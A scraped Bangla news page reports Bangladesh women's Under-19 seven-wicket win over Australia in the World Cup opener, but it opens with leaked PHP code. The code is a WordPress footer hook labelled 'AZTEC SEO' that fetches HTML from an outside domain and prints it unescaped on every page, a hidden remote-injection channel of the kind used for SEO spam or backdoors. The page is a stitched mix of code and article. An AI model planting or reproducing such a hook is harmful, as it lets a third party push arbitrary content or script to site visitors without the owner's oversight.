/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); অস্ট্রেলিয়াকে হারিয়ে বাংলাদেশের মেয়েদের শুভ সূচনা | Dhaka Sky News

পটুয়াখালীতে ভাস্কর্য ভাঙায় মুক্তিযোদ্ধাদের মাঝে ক্ষোভ, আটক এক

আগের সংবাদ

নেপালে ৭২ আরোহী নিয়ে বিমান বিধ্বস্ত : ৪৪ লাশ উদ্ধার

পরের সংবাদ

নারী অনূর্ধ্ব-১৯ বিশ্বকাপ

অস্ট্রেলিয়াকে হারিয়ে বাংলাদেশের মেয়েদের শুভ সূচনা

স্পোর্টস ডেস্ক

প্রকাশিত: January 14, 2023 , 7:10 pm

বাংলাদেশ নারী অনূর্ধ্ব-১৯ ক্রিকেটাররা প্রথম আসরে দুর্দান্ত শুরু করল। উদ্বোধনী ম্যাচে অস্ট্রেলিয়াকে ৭ উইকেটে হারাল তারা। দক্ষিণ আফ্রিকার বেনোনিতে ব্যাট করতে নেমে ১৩০ রান করে অস্ট্রেলিয়া। ৩ উইকেট হারিয়ে ১৩ বল হাতে রেখেই বাংলাদেশের মেয়েরা জয় ছিনিয়ে আনল।
টস হেরে ফিল্ডিংয়ে নেমে আঁটসাঁট বোলিং করেছে নারী টাইগ্রেসরা। দিশা ও মারুফাদের বোলিংয়ে অস্ট্রেলিয়ার ইনিংস থেমেছে ৫ উইকেট হারিয়ে ১৩০ রানে। বাংলাদেশের হয়ে জোড়া উইকেট পেয়েছিলেন অধিনায়ক দিশা বিশ্বাস ও মারুফা আক্তার। এছাড়া একটি উইকেট শিকার করেছেন রাবেয়া খাতুন।
১৩১ রান তাড়া করতে নেমে শুরুতেই ‘গোল্ডেন ডাক’ হয়ে ফেরেন টাইগ্রেস ওপেনার মিষ্টি সাহা। তবে শুরুর ধাক্কা সামলে দুর্দান্তভাবে লড়াইয়ে ফেরে বাঘিনীরা। আফিয়া ও দিলারা জুটি দলকে এগিয়ে নেন। দলীয় ৬৬ রানে আউট হওয়ার আগে ৪২ বলে ৪০ রান করেন দিলারা আক্তার।
এরপর বেশিক্ষণ টিকতে পারেনি আফিয়া প্রত্যাশাও। ২২ বলে ২৪ রান করেন এই ব্যাটার। তবে দিলারা ও আফিয়া জুটির পতন হলেও স্বর্ণা আর সুমাইয়ার অবিচ্ছিন্ন জুটিতে জয় নিয়েই মাঠ ছাড়ে বাংলাদেশ।